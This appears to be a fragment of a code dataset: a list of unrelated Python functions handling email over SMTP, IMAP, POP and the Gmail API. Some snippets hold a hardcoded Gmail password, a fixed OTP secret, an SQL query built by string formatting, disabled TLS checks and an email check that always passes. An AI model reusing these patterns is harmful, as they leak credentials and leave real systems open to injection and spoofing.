timeout\n return 3\n\n stat, out = port_talker.TCPTalk(name, SMTP_PORT,\n 60, # timeout (>30sec for messed up servers)\n \"HELO \" + my_ip + \"\\r\\nQUIT\\r\\n\",\n None, # terminator\n 1024, # max len\n 1) # use external resolver\n\n # expected answer:\n #220 'mail.forobozz.com' ESMTP\n #250 mail.frobozz.com Hello grue.frobozz.com [192.168.0.21], pleased to meet ya\n #221 mail.frobozz.com closing connection\n\n # Each line can be repeated several times, so we check that all codes appear\n # and that no other codes appear\n codes = map(lambda x: x[:4], string.split(out, '\\n'))\n valid_codes = ('220 ', '250 ', '221 ', '')\n try:\n for code in codes:\n assert(code in valid_codes)\n for valid in valid_codes:\n assert(valid in codes)\n except:\n # If we wanted, we could check whether reverse DNS lookup is not working.\n # This would be the most likely explanation\n add_info(name, SMTP_SERVER, \"cannot HELO SMTP server\")\n return 4\n add_info(name, SMTP_SERVER, \"OK\")\n return 0", "def verify_email_address(\n email,\n from_host='i3visio.com',\n from_email='verify@i3visio.com'\n ):\n e = VerifyEmail()\n\n try:\n status = e.verify(email, from_host, from_email)\n if status == e.EMAIL_FOUND:\n return 1\n except Exception:\n return -1\n return 0", "def find_unread(mailbox):\n # Not checking here would make the case where there are messages quicker\n numunseen = findall(rb'\\d+', 
mailbox.status('Inbox', '(UNSEEN)')[1][0])\n if numunseen == [b'0']:\n return ['There are no unread messages']\n\n mailbox.select('inbox')\n res, data = mailbox.search(None, 'UNSEEN')\n if res != 'OK':\n raise RuntimeError('error in search call')\n unseen = data[0].split()\n unseen.reverse()\n messagecount = user.capitalize() + ' : {} new messages'.format(len(unseen))\n meslist = [get_from_subject(mesid, mailbox).strip() for mesid in unseen]\n return [messagecount] + meslist", "def report_to_mothership():\n # no good, always returns 127.0.1.1\n #ipaddress = socket.gethostbyname(socket.gethostname())\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"gmail.com\",80))\n ipaddress = (s.getsockname()[0])\n s.close()\n payload = {'request': 'report','ip': ipaddress,'type': config.type}\n if requests.get(config.baseurl,params=payload,auth=HTTPBasicAuth(config.user, config.password),verify=False):\n return True\n return False", "def getMail():\n\n while 1:\n #if 1==1:\n \n try:\n Mailbox = poplib.POP3(c.Server['host'], c.Server['port']) \n Mailbox.user(c.Server['username']) \n Mailbox.pass_(c.Server['password']) \n numMessages = len(Mailbox.list()[1])\n \n \n log.info(\"Connected to %s and there are %i messages\"%(c.Server['host'], numMessages))\n \n for i in range(numMessages):\n msg = Mailbox.top(i+1, 10000)\n #msg = Mailbox.retr(i+1) # removes messages\n qIncomingMail.put(msg)\n log.debug(\"getMail: put message %i in queue\"%i)\n Mailbox.quit()\n \n except:\n log.error(\"Failed to connect to %s\"%c.Server['host'])\n time.sleep(60)", "def check_auth():", "def test_good_email():\n good_email = \"me@dom.com\"\n m = CannedRe.EMAIL.match(good_email)\n # print getmembers(m)\n assert m is not None, \"Canned RegEx email test failed for %s\" % good_email\n assert m.string == good_email", "def telegram_check():\n hotp = pyotp.HOTP('base32secret3232')\n random_seed = random.randint(9999, 99999)\n tkinter.messagebox.showinfo(\"\", \"Ga naar: http://t.me/BevFietsBot\" + \"\\nen stuur deze code: \" + hotp.at(random_seed)\n + \"\\nGa na versturen verder.\")\n telegram_output = telegram_read()\n\n if hotp.verify(telegram_output, random_seed):\n return 1\n else:\n tkinter.messagebox.showinfo(\"\", \"Inlog gegevens niet correct\")\n return 0", "def get_messages(user, password, server=\"pop.gmail.com\"):\n\n # define our connection\n pop_conn = poplib.POP3_SSL(server)\n pop_conn.user(user)\n pop_conn.pass_(password)\n\n # Get message tuples from server:\n tuples = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n pop_conn.quit()\n\n # returns the message objects in a list, discarding the other fields\n return [msg[1] for msg in tuples]", "async def verify_email(message, *args):\n\n (email,) = args\n try:\n valid = email_validator.validate_email(email)\n email = valid.email\n domain = valid.domain\n if domain != \"purdue.edu\":\n await message.author.send(\n embed=utils.create_embed(\n \"**INVALID EMAIL**: The email must be a purdue.edu email address.\"\n )\n )\n else:\n match = database.get_student_by_email(email)\n if match:\n if database.column_name_index(\"validated\", MEMBERS_COLUMNS, match) == 1:\n await message.author.send(\n embed=utils.create_embed(\n \"This email is already verified. 
If this is in error, contact an officer.\"\n )\n )\n else:\n await message.author.send(\n embed=utils.create_embed(\n \"You have already received a token, please check your spam and use `!validate <token>`!\"\n )\n )\n else:\n await message.author.send(\n embed=utils.create_embed(\n \"Sending verification email to {0}...\".format(email)\n )\n )\n record = await utils.lookup_student(email, message)\n if not record.success:\n await message.author.send(embed=utils.create_embed(record.error))\n await client.update_channel.send(\n embed=utils.create_embed(record.log)\n )\n return\n mail.send_mail(\n database.column_name_index(\"email\", MEMBERS_COLUMNS, record.record),\n \"b01lers discord verification\",\n \"Welcome, {0}, to b01lers! Please paste the following command into your DM with b01lers-bot: '!validate {1}'\".format(\n database.column_name_index(\n \"name\", MEMBERS_COLUMNS, record.record\n ),\n database.column_name_index(\n \"token\", MEMBERS_COLUMNS, record.record\n ),\n ),\n )\n await message.author.send(\n embed=utils.create_embed(\"Done! Please check your inbox.\")\n )\n database.add_student(record.record)\n logging.debug(\"Verified student with record {0}\".format(record.record))\n except email_validator.EmailNotValidError as e:\n await message.author.send(\n embed=utils.create_embed(\"**INVALID EMAIL**: {0}\".format(str(e)))\n )\n\n return", "def verify_email(uid, token):\n return True", "def search(folderName):\n\n result, data = mailBox.select(folderName, True)\n\n if TESTING:\n searchResult, uid = mailBox.uid('SEARCH', None, 'UNSEEN')\n else:\n searchResult, uid = mailBox.uid('SEARCH', None, 'ALL')\n\n number_messages = len(uid[0].split(' ')) if uid[0] != \"\" else 0\n if number_messages == 0:\n print \"\\nERROR: No messages found in %s\\n\" % folderName\n print \"\\n* Exiting... 
*\\n\"\n sys.exit(0)\n print \"\\nNumber of messages in %s: %d\" % (folderName, number_messages)\n\n uidList = \"\"\n for i in uid[0].split(' '):\n if i.isdigit():\n uidList += i + \",\"\n uidList = uidList[:-1]\n\n return uidList", "def get_new_mails(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\tself.imap.select(\"Inbox\")\n\t\t\tif self.settings.no_remaining == '0' and self.settings.uidnext:\n\t\t\t\tif self.settings.uidnext == self.settings.newuidnext:\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\t#request all messages between last uidnext and new\n\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse, message = self.imap.uid('search', None, \"ALL\")\n\t\t\temail_list = message[0].split()\n\t\telse:\n\t\t\temail_list = self.pop.list()[1]\n\n\t\treturn email_list", "def isEmailUsed(self, email):\n\n\t\ttestq = {\"email\": email};\n\t\ttest_result = self.db.request(\"getOne\", testq);\n\n\t\tif test_result:\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def opt_in(msg_hash):\r\n email, removed = Email.handler.opt_in(msg_hash)\r\n if email and removed:\r\n Email.handler.add_to_queue(None, None, [email], \"reddit.com\",\r\n datetime.datetime.now(g.tz),\r\n '127.0.0.1', Email.Kind.OPTIN)\r\n return email, removed", "def _get_unread_emails(conn):\n pattern = re.compile('^\\d+\\ \\(ENVELOPE\\ \\(\"(.*?)\"\\ \"(.*?)\"\\ \\(\\(\"(.*?)\"\\ .*?\\ \"(.*?)\"\\ \"(.*?)\"\\)\\).*$')", "def verify(\n self,\n email,\n from_host='example.com',\n from_email='verify@example.com'\n ):\n if DEBUG:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if not EMAIL_RE.search(email):\n logging.debug(f\"'{email}' is not a valid email\")\n return self.EMAIL_NOT_FOUND\n\n try:\n hostname = email.strip().split('@')[1]\n socket.gethostbyname(hostname)\n mail_exchangers = query_mx(hostname)\n except Exception as e:\n logging.debug(e)\n raise e\n\n logging.debug(f\"Found mail exchangers: {mail_exchangers}\")\n for i, mx in enumerate(mail_exchangers):\n mx_name = mx[1]\n logging.debug(f\"Testing {mx_name} (#{i})...\")\n\n logging.debug(f\"\\tConnecting to {mx_name}\")\n server = self.connect(mx_name)\n\n if not server:\n logging.debug(\"\\tCould not get connected to server.\")\n continue\n\n if DEBUG:\n server.set_debuglevel(1)\n\n logging.debug(\"\\tDo helo...\")\n try:\n code, resp = server.helo(mx_name)\n if code != 250:\n if not self.unverifiable(resp):\n raise UnableToVerifyException()\n continue\n except:\n pass\n\n logging.debug(\"\\tDo mail:\")\n try:\n code, resp = server.mail(from_email)\n logging.debug(f\"Code: {code}\")\n logging.debug(f\"Response: {resp}\")\n if code != 250:\n if not self.unverifiable(resp):\n raise UnableToVerifyException()\n continue\n except:\n pass\n\n try:\n logging.debug(\"\\tDo rcpt:\")\n code, resp = server.rcpt(email)\n logging.debug(f\"\\t\\tCode: {code}\")\n logging.debug(f\"\\t\\tResponse: {resp}\")\n\n if code != 250:\n if self.nonexistent(resp):\n return self.EMAIL_NOT_FOUND\n elif self.unverifiable(resp):\n raise UnableToVerifyException()\n else:\n continue\n except:\n pass\n\n try:\n logging.debug(\"\\tDo data:\")\n code, resp = server.data('Ahoy. Are you there? 
Testing my python3 port of the package ;) {0}.{0}'.format(_smtp.CRLF))\n logging.debug(f\"\\t\\tCode: {code}\")\n logging.debug(f\"\\t\\tResponse: {resp}\")\n if code != 250:\n if self.nonexistent(resp):\n return self.EMAIL_NOT_FOUND\n elif self.unverifiable(resp):\n raise UnableToVerifyException()\n elif code == 250:\n return self.EMAIL_FOUND\n except:\n pass\n\n raise UnableToVerifyException()", "def import_email(email, nickname, init_cache, quiet):\n\n gmail = GmSync(email, nickname, load_config(not quiet))\n gmail.pull()\n if init_cache:\n print('fetching cacheable messages')\n gmail.init_cache()", "def get_unread_count(imap):\n status, messages = imap.select('Inbox')\n status, response = imap.uid('search', None, 'UNSEEN')\n unread_msg_nums = response[0].split()\n return len(unread_msg_nums)", "def verify_email(entered_email):\n return EMAIL_RE.match(entered_email)", "def check_email(request):\n\temail_id = str(request.GET['id'])\n\tuser = User.objects.filter(username=email_id,is_active=1).exists()\n\tif user:\n\t\treturn HttpResponse(1)\n\telse:\n\t\treturn HttpResponse(0)", "def test_email_good(get_email, capsys):\n e = get_email\n e.send()\n out, err = capsys.readouterr()\n assert \"Message sent\" in out", "def is_replied_to(thread):\r\n messages = thread['messages']\r\n if len(messages) < 2:\r\n return False\r\n user_email = get_sender_email(messages[0])\r\n for i in range(1, len(messages)):\r\n sender_email = get_sender_email(messages[i])\r\n if user_email != sender_email:\r\n return True\r\n return False", "def email(request, error='', message=''):\n output = ''\n try:\n host = settings.EMAIL_HOST\n imap = settings.EMAIL_IMAP\n eddress = settings.EMAIL_HOST_USER\n password = settings.EMAIL_HOST_PASSWORD\n port = settings.EMAIL_PORT\n prefix = settings.EMAIL_SUBJECT_PREFIX\n except:\n error += 'ERROR: You haven\\'t configured e-mail in settings.py.'\n if error == '':\n mail = imaplib.IMAP4_SSL(imap)\n mail.login(eddress, password)\n mail.select(\"inbox\")\n result, data = mail.uid('search', None, \"ALL\")\n uids = data[0].split()\n emails = []\n for u in uids:\n result, data = mail.uid('fetch', u, '(RFC822)')\n raw_email = data[0][1]\n email_message = message_from_string(raw_email)\n for part in email_message.walk():\n if part.get_content_type() == 'text/plain':\n output += 'PART: ' + str(part.get_payload()) + '\\n'\n return render_to_response('feedback/email.html', {'error': error, 'message': message, 'output': output}, context_instance=RequestContext(request))", "def check_google_token():\n #get token from login page and google's token rigamorole\n gtoken = request.form.get(\"idtoken\")\n #validate token\n g_profile = apiapijoyjoy.validate_google_token(gtoken)\n #collect user info from google\n name = g_profile['given_name']\n lname = g_profile['family_name']\n email = g_profile['email']\n # start a session\n session[\"user_id\"] = email\n user = User.query.filter_by(email=email).first()\n #create flags for Flask to return to google's scripts and take frontend action accordingly\n if user:\n return \"FLASK SEES USER\"\n else:\n #create new user in SQLAlchemy using info above from Google. BUT WAIT WHAT?! CODE REVIEW PLS!\n new_user = User(email=email, name=name, lname=lname)\n db.session.add(new_user)\n db.session.commit()\n return \"FLASK SEES NO USER\"", "def check_mail(eml):\n return eml[::-1] if eml != '#N/A' else '#N/A'", "def __get_emails(self):\n # This returns a list of Gmail message objects. 
Documentation can be found at\n # https://developers.google.com/gmail/api/v1/reference/users/messages/list\n return self.__service.users().messages().list(userId='me').execute()['messages']", "def get_mail() -> imaplib.IMAP4_SSL:\n mail = imaplib.IMAP4_SSL(config['mail']['imap'])\n mail.login(USER_MAIL, PASS_MAIL)\n mail.list()\n mail.select('inbox')\n return mail", "def gmailtoken_generator():\r\n # If modifying these scopes, delete the file token.pickle.\r\n # SCOPES = ['https://www.googleapis.com/auth/gmail.readonly']\r\n SCOPES = ['https://www.googleapis.com/auth/gmail.send']\r\n\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n service = build('gmail', 'v1', credentials=creds)", "def api_check_email(request):\n email = request.matchdict['email']\n check_email = RepositorioUsario.check_email(request, email)\n\n return check_email", "def get(self, request, format=None):\n user_social_auth = UserSocialAuth.objects.get(user=self.request.user)\n credentials = AccessTokenCredentials(user_social_auth.extra_data['access_token'],\n 'my-user-agent/1.0')\n http = httplib2.Http()\n http = credentials.authorize(http)\n service = discovery.build('gmail', 'v1', credentials=credentials)\n results = service.users().messages().list(userId='me').execute()\n messages = []\n for result in results['messages'][:100]:\n \n msg = service.users().messages().get(userId='me', id=result['id']).execute()\n subject = ''\n _from = ''\n for header in msg['payload']['headers']:\n if header['name'] == 'Subject':\n subject = header['value']\n elif header['name'] == 'From':\n _from = header['value']\n messages.append({'subject': subject, 'from': _from})\n \n return Response(messages)", "def verify_GIF_sent(gif_ID):\n try:\n messages = driver.find_elements_by_class_name('m-messenger__message-content')\n gif = messages[-1].find_element_by_tag_name('img')\n src = gif.get_attribute('src')\n actual_gif_ID = src[src.index('media/') + len('media/'):]\n actual_gif_ID = actual_gif_ID[:actual_gif_ID.index('/')]\n #print(gif_ID)\n #print(actual_gif_ID)\n return gif_ID == actual_gif_ID\n except Exception as e:\n #print(str(e))\n return False", "def test_sendEmailVerification(self, testUser):\n with mail.record_messages() as outbox:\n testUser.send_email_verification()\n assert len(outbox) == 1\n msg = outbox[0]\n assert \"jjones@yahoo.com\" in msg.recipients\n assert msg.subject == 'Ask Your Peeps: Email Verification'\n assert 'To verify your email' in msg.body\n assert 'Dear John' in msg.body", "def email_checker(email):\n regex = '^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$'\n if re.search(regex, email):\n return True\n else:\n return False", "def email_body_verify_email_address(url, code): #bug267\n\tmsg = \"\"\n\treturn msg", "def check_account(url):\n \n slug = url.replace('http://', '').replace('/', '-')\n \n 
filename = \"hash_\" + slug + \".sha256\"\n \n import re\n \n user = re.search('/\\d/(.*?)/$', url).group(1)\n \n games = get_games(url)\n\n new_hash = hash(games)\n old_hash = ''\n\n try:\n with open (filename) as hash_file:\n old_hash = hash_file.read()\n except:\n old_hash = ''\n \n if new_hash != old_hash:\n message = 'Map: %s\\r\\nType: %s\\r\\nOutcome: %s\\r\\nDate: %s\\r\\n' %(games[0]['map'], games[0]['type'], games[0]['outcome'], games[0]['date'])\n \n send_mail(user + ' played SC2', message)\n\n with open (filename, \"w\") as hash_file:\n hash_file.write(new_hash)", "def _check_has_message(data):\r\n return re.match(r'^:[a-zA-Z0-9_]+\\![a-zA-Z0-9_]+@[a-zA-Z0-9_]+'\r\n r'\\.tmi\\.twitch\\.tv '\r\n r'PRIVMSG #[a-zA-Z0-9_]+ :.+$', data)", "def checkemail(emailtxt, mdtype):\n score = 0 # only allow scores if the emailaddress is okay. Issue #17\n if emailtxt.find(\"@\") == -1 or emailtxt.find(\".\") == -1 or len(emailtxt) < 3:\n score = 0\n if mdtype == \"dataset\" or mdtype == \"series\":\n # checkid = 7, so the index in the matrix is: 6\n result = checksdatasets[6][2][score]\n else:\n result = checksservices[6][2][score]\n return MkmScore(emailtxt, score, result)", "def sendEmailTo(to):\n try:\n ImgFileName = \"good_boi.png\"\n img_data = open(ImgFileName, 'rb').read()\n msg = MIMEMultipart()\n msg['Subject'] = 'I heard you were feeling down...'\n msg['From'] = 'happybot184@yahoo.com'\n msg['To'] = to\n text = MIMEText(\"So I'm sending you this cute picture to cheer you up!\")\n msg.attach(text)\n image = MIMEImage(img_data, name=os.path.basename(ImgFileName))\n msg.attach(image)\n\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login('beehappytest1@gmail.com','b33h@ppy')\n s.sendmail('beehappytest1@gmail.com',to,msg.as_string())\n s.quit()\n return True\n except:\n return False\n # gmail_user = 'beehappytest1@gmail.com'\n # gmail_password = 'b33h@ppy'\n #\n # sent_from = gmail_user\n # subject = \"Happy\"\n # body = \"Hey, what's up?\"\n #\n #\n # email_text = \"\"\"\\\n # From: %s\n # To: %s\n # Subject: %s\n #\n # %s\n # \"\"\" % (sent_from, \", \".join(to), subject, body)\n #\n # email_text = \"asdf\"\n #\n # server = smtplib.SMTP('smtp.gmail.com', 587)\n # server.ehlo()\n # server.starttls()\n # server.login(gmail_user, gmail_password)\n # server.sendmail(sent_from, to, email_text)\n # server.close()", "def verifyemail(request,id=None,key=None):\n logging.debug('')\n if settings.EMAIL_VALIDATION == True:\n user = User.objects.get(id=id)\n if user:\n if user.email_key == key:\n user.email_isvalid = True\n clear_email_validation_message(user)\n user.save()\n data = {'action_type': 'validation_complete'}\n return render_to_response(\n 'authenticator/changeemail.html',\n RequestContext(request, data)\n )\n else:\n logging.error('hmm, no user found for email validation message - foul play?')\n raise Http404", "def lookup_email(args):\n db = cache.get_default()\n if args.forced:\n db.lookup_email(args.address)\n try:\n info = db.get_email(args.address, nolookup=args.cached)\n print('{!r:} is {:s}valid: {:s}.'.format(info.address, '' if info.is_valid else 'in',\n info.reason))\n except exceptions.CacheMissException:\n exit('{!r:} is not in the cache.'.format(args.address))", "async def altcheck(self, ctx: Context):\n\t\tauthormsg = ctx.author\n\t\t#authormsg = await self.convertuser(ctx.author.id)\n\t\tif authormsg.id == ownerid:\n\t\t\tpass\n\t\telif authormsg.room_permissions.is_mod or authormsg.room_permissions.is_admin == 
True:\n\t\t\tpass\n\t\telse:\n\t\t\treturn await self.send(\"You don't have permission to do that.\", whisper=[ctx.author.id])\n\t\tawait self.send(\"This may take a while, be patient.\", whisper=[ctx.author.id])\n\t\tusers = []\n\t\tprint(\"before for loop\")\n\t\tfor user in self.room.users:\n\t\t\tuserdata = await self.returnavinfo(user)\n\t\t\tif userdata['message'] == \"Twitter\":\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif \"Marked as spam\" in userdata['message']:\n\t\t\t\t\tusers.append(userdata['message'])\n\t\t\t\t\tcontinue\n\t\t\t\tdtm = userdata['crdate']\n\t\t\t\trntime = datetime.now()\n\t\t\t\td = datetime.fromisoformat(dtm[:-1])\n\t\t\t\td.strftime('%Y-%m-%d %H:%M:%S.%f')\n\t\t\t\ttimedeltuh = rntime - d\n\t\t\t\tif timedeltuh.days >= 14:\n\t\t\t\t\tappusdata = userdata['message'] + f\"- {timedeltuh} • \"\n\t\t\t\t\tusers.append(appusdata)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\n\t\tprint(\"before lencheck\")\n\t\tuserssend = \"\".join(users)\n\t\tprint(userssend)\n\t\tprint(len(userssend))\n\t\ttry:\n\t\t\tif len(userssend) >= 520:\n\t\t\t\tstrround = round(len(userssend))\n\t\t\t\tstrlen = round(strround) / 2\n\t\t\t\tfirst_half = userssend[:int(strlen)]\n\t\t\t\tsecond_half = userssend[int(strlen):]\n\t\t\t\tawait self.send(first_half, whisper=[ctx.author.id])\n\t\t\t\tawait asyncio.sleep(2)\n\t\t\t\tawait self.send(second_half, whisper=[ctx.author.id])\n\t\t\t\treturn\n\t\t\tprint(\"done\")\n\t\t\tawait self.send(userssend, whisper=[ctx.author.id])\n\t\texcept Exception as e:\n\t\t\tprint(e)", "def is_chat(message):\n labels = message.get('X-Gmail-Labels', \"\").split(',')\n return 'Chat' in labels", "def google_validate(self, token):\n try:\n payload = client.verify_id_token(token, GOOGLE_USER_ID)\n if payload['iss'] not in ['accounts.google.com', 'https://accounts.google.com'] or payload['aud'] != GOOGLE_USER_ID:\n return False\n else:\n return payload\n except crypt.AppIdentityError:\n return False", "def main():\n #Gmail2TelegramClient(\"1234\") -- a person\n #Gmail2TelegramClient(\"-1234\") -- group chat", "def test_parse_message_google_login(self):\n for test_case in self.success_test_google_login:\n expected = test_case[KEY_EXPECTED]\n google_obj = app.on_new_google_user(test_case[KEY_INPUT])\n self.assertEqual(expected, google_obj)", "def is_email_valid(email):\n\n result = requests.get(\n f'https://api.hunter.io/v2/email-verifier?email={email}&api_key={settings.HUNTER_IO_API_KEY}'\n ).json()\n\n return True if result.get('data').get('status') == 'valid' else False", "def search_email_by_all(M):\n print \"basic search mode\\n\"\n rv, data = M.uid('search', None, 'All')\n if check_response(rv):\n return data\n else:\n return None", "def check_users_online(redis_server):\n before_timestamp = int((time.time()) - (ENVIRONMENT['USER_TIMEOUT']))\n\n logging.info(\"checking users online, purging before %s\" % before_timestamp)\n logging.info(\"checking for users before: %s\" % before_timestamp) \n\n expired_users_count = redis_server.zcount(ENVIRONMENT['REDIS_PREFIX'] + \"users_timestamp\",0,before_timestamp)\n logging.info(\"found %d users to expire\" % expired_users_count)\n if expired_users_count > 0:\n expired_users = redis_server.zrange(ENVIRONMENT['REDIS_PREFIX'] + \"users_timestamp\",0, expired_users_count)\n if expired_users != None:\n for key in expired_users:\n channel_name = key.split(':')[0]\n username = key.split(':')[1]\n key = ENVIRONMENT['REDIS_PREFIX'] + \"users:%s\" % username\n data = redis_server.get(key)\n if data != None:\n user = 
User(**json.loads(data))\n\n msg = ChatMessage(nickname='system', username='system', message=\"%s can not been found in the room\" % user.nickname, channel_name = channel_name);\n \n chat_channel = get_chat_channel(redis_server, channel_name)\n chat_channel.add_chat_message(msg)\n chat_channel.remove_user(user)\n else:\n logging.info(\"unable to find expired user: %s\" % (key))\n\n\n ## setup our next check\n g = Greenlet(check_users_online, redis_server)\n g.start_later(ENVIRONMENT['USER_TIMEOUT_INTERVAL'])", "def get_email_ids(conn, query='ALL'):\n if conn.state != \"SELECTED\":\n raise imaplib.IMAP4.error(\"Cannot search without selecting a folder\")\n\n rv, data = conn.uid('search', None, query)\n if rv != 'OK':\n print (\"Could not fetch email ids\") # for some reason...\n return []\n\n return data[0].split()", "def valid_mx(self, domain):\n try:\n self.nslookup_installed()\n except:\n return True # Valid email as we cant check with nslookup\n\n p = subprocess.Popen(['nslookup', '-query=mx', domain], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n\n try:\n return bool(re.search('mail exchanger', out))\n except:\n # raise Exception(\"Exception in DNS lookup!\" + err)\n return False", "def __validate_email(self,mail):\n if re.match(r\"[\\w\\W]*@+[\\w\\W]*[.]+[\\w]{2,4}\",mail):\n return True\n return False", "def __send_mail(self,username,email):\n try:\n s = smtplib.SMTP(\"smtp.gmail.com\",587)\n s.starttls()\n s.login(vars.email[\"username\"],vars.email[\"password\"])\n otp = random.randint(111111,999999)\n message = MIMEMultipart()\n message[\"From\"] = vars.email[\"username\"]\n message[\"To\"] = email\n message[\"Subject\"] = \"otp\"\n body = MIMEText(\"otp :- \"+str(otp))\n message.attach(body)\n if self.__save_otp(username,otp):\n s.sendmail(vars.email[\"username\"],email,message.as_string())\n s.quit()\n return \"1\"\n else:\n return error(1065)\n except Exception as e:\n print(vars.email)\n print(e)\n return error(1067)", "async def send_email_gmail(self, *, emails: List[EmailStr], username: str, generated_code: str):\n email_content = f\"\"\"\n <html>\n <body>\n <p>Hello {username}, Your email verification code is {generated_code}\n <br>Thanks for using our Todo Application.</p>\n </body>\n </html>\n \"\"\"\n message = email.message.Message()\n message[\"Subject\"] = 'Todo App Authentication'\n message[\"From\"] = EMAIL_ADDR\n\n message.add_header('Content-Type', 'text/html')\n message.set_payload(email_content)\n client = smtplib.SMTP('smtp.gmail.com: 587')\n client.starttls()\n\n # Login Credentials to send the mail.\n client.login(message[\"From\"], EMAIL_PWD)\n\n for user_email in emails:\n client.sendmail(message[\"From\"], user_email, message.as_string())\n print(f\"sending to {user_email}\")", "def fetch_messages_from_imap(host, port, username, password):\n\n with imaplib.IMAP4(host, port=port) as client:\n client.starttls()\n client.login(username, password)\n client.select(\"INBOX\", readonly=False)\n\n client.create(\"Archives\")\n client.create(\"Archives/Crashreport\")\n\n sorted_reply = client.uid(\"SORT\", \"(DATE)\", \"UTF7\", \"ALL\")\n\n if not sorted_reply[0] == \"OK\":\n raise IMAPClientError()\n\n sorted_messages = sorted_reply[1][0].split()\n\n for msg_uid in sorted_messages:\n reply = client.uid(\"FETCH\", msg_uid, \"(RFC822)\")\n\n if reply[0] != \"OK\":\n raise IMAPClientError()\n\n message = email.message_from_bytes(reply[1][0][1])\n\n yield message\n\n # mark message as read and move to archives\n mark_read_reply = 
client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Seen)\")\n if mark_read_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # moving messages in IMAP unfortunately means copy and delete\n copy_reply = client.uid(\"COPY\", msg_uid, \"Archives/Crashreport\")\n if copy_reply[0] != \"OK\":\n raise IMAPClientError()\n\n delete_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Deleted)\")\n if delete_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # delete the message immediately\n client.expunge()", "def check_if_online(self, jid):\n return self._roster.check_if_online(jid)", "def check_db(self, email, clean_type=1):\r\n try:\r\n sql = \"\"\"\r\n SELECT * FROM emails WHERE email = '{}' \r\n AND clean_type = {}\r\n AND email_status IN('clean','catch-all')\r\n LIMIT 1\r\n \"\"\".format(email, clean_type)\r\n self.db.cur.execute(sql)\r\n resp = self.db.cur.fetchone()\r\n if resp:\r\n return {EMAIL:resp[EMAIL]}\r\n except:\r\n print(\"sql error: {}\".format(sql))\r\n return None", "def check_new_messages(client_id):\n # Return if driver is not defined or if whatsapp is not logged in.\n # Stop the timer as well\n if client_id not in drivers or not drivers[client_id] or not drivers[client_id].is_logged_in():\n timers[client_id].stop()\n return\n\n # Acquire a lock on thread\n if not acquire_semaphore(client_id, True):\n return\n\n try:\n # Get all unread messages\n res = drivers[client_id].get_unread()\n # Mark all of them as seen\n for message_group in res:\n message_group.chat.send_seen()\n # Release thread lock\n release_semaphore(client_id)\n # If we have new messages, do something with it\n if res:\n print(res)\n except:\n pass\n finally:\n # Release lock anyway, safekeeping\n release_semaphore(client_id)", "def func_from(self, data, get_recv):\n if get_recv:\n checking = bytes(data).decode().encode('ascii', 'ignore').decode()\n else:\n checking = bytes(data).decode().encode('ascii', 'ignore').decode().splitlines()[0]\n data_list = checking.split(':')\n remove_bracket = str(data_list[1])\n remove_bracket = remove_bracket[2:-1]\n data_list[1] = remove_bracket\n check = data_list[0].lower().rstrip()\n if check == 'mail from':\n message = self.conf_th_ic.get_item(q_key='std-messages').get(check)\n self.func_sender(message)\n return True", "def send_mail(Email_id,OTP):\r\n try : \r\n s = smtplib.SMTP('smtp.gmail.com', 587) \r\n s.ehlo()\r\n # start TLS for security \r\n s.starttls() \r\n # Authentication \r\n s.login(mail_id,mail_Password) \r\n message = str(OTP)\r\n # sending the mail \r\n s.sendmail(mail_id, Email_id, message) \r\n # terminating the session \r\n s.quit() \r\n msg=\"Mail has been sent to Registered mail id.\"\r\n except :\r\n msg=\"UserName and Password not accepted kindly provide correct UserName and Password.\"\r\n return msg", "def util_unread(self):\n try:\n query = 'from:scholaralerts-noreply@google.com'\n page_token = None\n p_emails = []\n while True:\n request = self.service.users().messages().list(userId='me',\n q=query, pageToken=page_token)\n response = request.execute()\n if 'messages' not in response:\n break\n p_emails.extend(response['messages'])\n if 'nextPageToken' not in response:\n break\n page_token = response['nextPageToken']\n self.service.users().messages().batchModify(userId='me', body={\n 'addLabelIds': ['UNREAD'],\n 'ids': [e['id'] for e in p_emails]\n }).execute()\n\n except errors.HttpError as error:\n _utils.logger.error(f'An error occurred: ${error}')" ]
